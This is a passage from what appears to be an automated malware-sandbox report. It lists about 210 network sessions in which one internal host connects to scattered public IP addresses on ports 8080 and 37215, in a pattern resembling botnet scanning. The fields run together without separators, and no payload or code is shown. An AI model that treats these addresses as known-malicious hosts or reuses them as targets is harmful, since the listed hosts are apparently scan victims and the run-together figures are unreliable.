                                                        21399192.168.2.235053891.119.36.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21400192.168.2.2353544206.114.217.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21401192.168.2.233928894.51.194.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21402192.168.2.2358646139.164.220.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21403192.168.2.2349530146.126.42.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21404192.168.2.2351342216.189.166.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21405192.168.2.234584272.53.80.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21406192.168.2.235228639.198.112.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21407192.168.2.235899074.127.28.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21408192.168.2.2350184203.177.183.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21409192.168.2.235688492.132.130.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21410192.168.2.233738896.234.46.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21411192.168.2.234569094.27.183.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21412192.168.2.2334330141.175.165.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21413192.168.2.2340164210.244.168.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21414192.168.2.2343796100.209.52.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21415192.168.2.2336326222.117.70.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21416192.168.2.234144498.179.224.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21417192.168.2.2356360121.23.80.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21418192.168.2.23476045.96.38.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21419192.168.2.2342926213.39.35.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21420192.168.2.233420485.123.14.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21421192.168.2.235425614.213.255.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21422192.168.2.2337872184.80.235.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21423192.168.2.234564452.94.99.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21424192.168.2.235722683.143.97.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21425192.168.2.2351838213.205.92.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21426192.168.2.2360836210.123.41.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21427192.168.2.234340278.97.198.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21428192.168.2.2352728128.83.104.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21429192.168.2.2348602193.7.237.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21430192.168.2.2357654123.144.237.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21431192.168.2.2338728139.90.184.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21432192.168.2.2347102151.122.128.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21433192.168.2.2333560161.138.184.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21434192.168.2.2359158198.177.247.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21435192.168.2.235435281.195.86.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21436192.168.2.2344576204.72.228.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21437192.168.2.2346972217.49.126.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21438192.168.2.235330618.151.162.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21439192.168.2.2357638221.175.218.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21440192.168.2.233571062.124.187.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21441192.168.2.235938425.7.72.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21442192.168.2.233553091.136.72.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21443192.168.2.2356126208.17.175.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21444192.168.2.233973854.147.181.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21445192.168.2.2352870132.128.253.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21446192.168.2.234436039.197.252.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21447192.168.2.2346190106.148.156.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21448192.168.2.2341936212.76.29.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21449192.168.2.235340045.175.85.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21450192.168.2.235406018.221.1.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21451192.168.2.2360404206.47.49.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21452192.168.2.2341414122.98.225.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21453192.168.2.2346156171.156.112.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21454192.168.2.235038273.214.20.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21455192.168.2.235199666.12.242.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21456192.168.2.2334290145.147.2.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21457192.168.2.234114697.66.7.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21458192.168.2.235153673.200.19.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21459192.168.2.2353912187.227.239.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21460192.168.2.235909651.175.110.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21461192.168.2.2347938195.147.238.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21462192.168.2.2353246128.41.57.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21463192.168.2.2346160175.26.180.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21464192.168.2.234831481.162.228.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21465192.168.2.235857235.148.240.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21466192.168.2.2343084130.89.229.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21467192.168.2.2350318164.10.118.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21468192.168.2.235696252.0.66.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21469192.168.2.2334476150.159.236.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21470192.168.2.2342564176.213.24.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21471192.168.2.234409638.215.250.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21472192.168.2.2345466211.109.130.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21473192.168.2.2348728141.116.168.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21474192.168.2.233707871.123.19.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21475192.168.2.234391243.230.174.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21476192.168.2.2335402103.32.79.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21477192.168.2.233380488.25.237.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21478192.168.2.234862676.44.151.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21479192.168.2.2360598177.216.213.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21480192.168.2.2356492108.2.202.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21481192.168.2.2350106148.113.244.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21482192.168.2.2349536179.44.200.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21483192.168.2.234601080.163.136.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21484192.168.2.2357976200.81.227.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21485192.168.2.234487272.18.8.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21486192.168.2.2343166106.208.92.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21487192.168.2.235527084.62.122.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21488192.168.2.233577466.224.77.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21489192.168.2.2337232125.10.58.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21490192.168.2.234441227.38.16.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21491192.168.2.2357834124.214.50.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21492192.168.2.235614035.69.242.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21493192.168.2.2358100119.221.0.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21494192.168.2.2347290180.67.4.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21495192.168.2.2355688138.160.70.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21496192.168.2.2358256143.30.214.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21497192.168.2.235119824.168.179.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21498192.168.2.235612682.127.193.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21499192.168.2.2356414174.183.220.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21500192.168.2.23408101.24.165.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21501192.168.2.2343832132.110.16.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21502192.168.2.2352956201.94.79.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21503192.168.2.2344908123.28.173.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21504192.168.2.2344050199.43.147.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21505192.168.2.23475642.31.162.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21506192.168.2.2354116177.43.149.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21507192.168.2.2359092128.115.83.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21508192.168.2.2358874123.85.104.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21509192.168.2.233676894.12.191.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21510192.168.2.2336076112.77.205.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21511192.168.2.2337392200.147.21.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21512192.168.2.233409898.149.147.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21513192.168.2.2334242126.13.152.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21514192.168.2.2345866178.235.237.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21515192.168.2.2336030201.9.63.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21516192.168.2.2342398165.45.206.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21517192.168.2.235895878.10.7.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21518192.168.2.2352382173.116.197.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21519192.168.2.2342068218.19.225.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21520192.168.2.233480478.103.90.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21521192.168.2.2349944157.44.54.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21522192.168.2.2348336197.167.204.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21523192.168.2.2358342157.114.144.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21524192.168.2.2333634157.248.5.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21525192.168.2.2348954206.255.184.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21526192.168.2.234097241.53.124.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21527192.168.2.2359230157.98.53.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21528192.168.2.235404841.20.192.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21529192.168.2.233590841.254.48.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21530192.168.2.2337174157.97.32.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21531192.168.2.235256641.233.168.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21532192.168.2.234319441.178.21.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21533192.168.2.2337006157.75.116.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21534192.168.2.2354616197.141.91.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21535192.168.2.2343668197.133.85.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21536192.168.2.2341888157.138.67.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21537192.168.2.2344204157.191.191.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21538192.168.2.234602641.19.34.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21539192.168.2.234056883.135.220.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21540192.168.2.2358190160.138.157.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21541192.168.2.2341016181.52.109.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21542192.168.2.234626241.201.176.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21543192.168.2.235058841.238.69.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21544192.168.2.2337880157.173.109.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21545192.168.2.2336412157.222.18.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21546192.168.2.2357122197.254.29.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21547192.168.2.235321841.27.236.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21548192.168.2.2340484154.44.129.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21549192.168.2.2356644213.224.168.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21550192.168.2.233850241.181.173.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21551192.168.2.2359650197.76.161.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21552192.168.2.234518641.173.53.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21553192.168.2.2360382157.245.156.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21554192.168.2.235178441.155.2.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21555192.168.2.2333476197.226.104.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21556192.168.2.2352872157.61.117.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21557192.168.2.2338990197.2.76.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21558192.168.2.2357530197.81.161.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21559192.168.2.234188441.181.68.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21560192.168.2.2350168197.86.190.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21561192.168.2.2341460197.132.46.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21562192.168.2.2344350197.226.153.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21563192.168.2.234502890.159.249.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21564192.168.2.2356498197.105.134.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21565192.168.2.2347664157.161.111.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21566192.168.2.2354310179.105.160.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21567192.168.2.234373641.251.150.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21568192.168.2.233848841.103.30.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21569192.168.2.233356841.24.203.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21570192.168.2.2346604197.192.201.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21571192.168.2.2356684157.245.92.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21572192.168.2.2350200157.155.205.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21573192.168.2.2356286157.106.57.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21574192.168.2.2332842187.198.17.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21575192.168.2.2341154197.137.3.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21576192.168.2.2342850107.43.238.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21577192.168.2.235527641.136.30.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21578192.168.2.235249641.112.75.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21579192.168.2.2335854157.9.33.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21580192.168.2.2360110157.206.228.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21581192.168.2.2355396157.159.111.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21582192.168.2.234839641.213.144.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21583192.168.2.2338226157.155.212.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21584192.168.2.2344732197.205.67.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21585192.168.2.2335988101.198.133.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21586192.168.2.235236441.254.192.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21587192.168.2.2356954157.83.52.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21588192.168.2.2337244118.66.205.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21589192.168.2.2333970197.50.66.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21590192.168.2.2342206164.70.155.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21591192.168.2.2345654157.136.88.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21592192.168.2.2353304197.96.99.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21593192.168.2.235314241.185.194.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21594192.168.2.2338470197.29.202.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21595192.168.2.2354296197.63.177.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21596192.168.2.2335124157.228.143.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21597192.168.2.2339998157.59.136.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21598192.168.2.234823641.208.244.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21599192.168.2.2339746157.11.187.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21600192.168.2.2349140157.207.217.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21601192.168.2.2341826197.37.101.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21602192.168.2.2336118197.117.100.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21603192.168.2.233896641.254.179.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21604192.168.2.233683041.137.248.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21605192.168.2.2335304157.129.59.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21606192.168.2.2356006157.141.183.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21607192.168.2.234814041.247.169.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21608192.168.2.2359734157.193.113.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
